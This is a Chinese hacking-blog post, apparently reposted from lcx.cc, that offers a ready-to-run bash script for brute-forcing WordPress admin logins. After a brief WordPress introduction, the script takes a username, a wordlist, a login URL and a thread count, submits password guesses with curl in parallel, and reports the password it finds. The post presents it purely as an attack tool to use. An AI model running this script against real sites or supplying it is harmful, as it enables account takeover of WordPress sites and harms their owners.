记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

分享一个WordPress后台密码暴力破解脚本

2013-06-10 13:25

WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 是一个免费的开源项目,在GNU通用公共许可证下授权发布。

目前最新版本为4.0版。 WordPress 被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。

“WordPress”这个名字出自 Christine Selleck 的主意,他是主要开发者Matt Mullenweg的朋友。

本次给大家带来WordPress后台密码暴力破解程序,请先确认机器已安装curl。

#!/bin/bash
#by leo108
#使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数
#例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15
user=$1
zidian=$2
url=$3
thread=$4
function guess {
curl -s -d "log=$user&pwd=$1" $url >> $1.html
l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}')
if [ 0 -eq $l ]; then
echo $1 >> pwd.txt
rm $1.html
return 1
else
rm $1.html
return 0
fi
}
if [ -e pwd.txt ]; then
rm pwd.txt
fi
tmp_fifofile="/tmp/$$.fifo"
mkfifo $tmp_fifofile
exec 6<>$tmp_fifofile
rm $tmp_fifofile
for ((i=0;i<$thread;i++));
do
echo
done >&6
while read line;do
if [ -e pwd.txt ]; then
break
fi
read -u6
{
echo "Testing "$line
guess $line
echo >&6
} &
done < $zidian
wait
exec 6>&-
if [ -e pwd.txt ]; then
echo "Password is "
cat pwd.txt
rm pwd.txt
else
echo "Not Found"
fi
exit 0

source

知识来源: lcx.cc/?i=3567

阅读:79673 | 评论:0 | 标签:暴力破解

想收藏或者和大家分享这篇好文章→复制链接地址

“分享一个WordPress后台密码暴力破解脚本”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云